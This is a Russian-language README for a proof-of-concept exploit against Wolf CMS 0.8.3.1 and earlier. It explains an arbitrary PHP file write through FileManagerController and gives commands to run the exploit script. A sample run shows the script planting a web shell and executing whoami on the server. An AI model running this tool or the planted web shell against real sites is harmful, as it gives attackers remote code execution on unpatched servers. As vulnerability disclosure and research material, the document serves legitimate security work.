
PoC-эксплойт для Wolf CMS <= 0.8.3.1: выполняет аутентификацию в панели администратора, записывает произвольный PHP-файл в /public через FileManagerController и выполняет команды через веб-шелл.
Этот репозиторий содержит Proof of Concept (PoC) эксплойт для CVE-2026-67206
Этот проект предоставлен только для образовательных целей и авторизованного тестирования безопасности. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет разрешения.
Уязвимость произвольной записи файлов существует в версиях Wolf CMS до 0.8.3.1 включительно. Она позволяет аутентифицированному злоумышленнику записывать вредоносные произвольные файлы в каталог /public корня веб-сервера через функции create_file() и save() в FileManagerController.php. Функция create_file() в FileManagerController.php не проверяет расширения файлов, что позволяет аутентифицированным злоумышленникам записывать вредоносные PHP-скрипты и получать привилегии удалённого выполнения кода.
Подробный разбор с анализом исходного кода и демонстрацией эксплойта можно найти в моём блоге на Medium.
Затронуты все версии Wolf CMS до 0.8.3.1 включительно. Репозиторий Wolf CMS был заархивирован 28 августа 2021 года и больше не поддерживается активно. На данный момент патчей для этой уязвимости не существует.
git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt
python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin
└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K
[*] Logging in with provided credentials...
[+] Login successful
[*] Creating a file named shell.php...
[+] File creation successful
[*] Attempting to write payload to shell.php...
[+] Payload written successfully!
[+] Web shell can be accessed with 'cmd' query string at http://127.0.0.1:8080/public/shell.php
[+] Testing output of http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data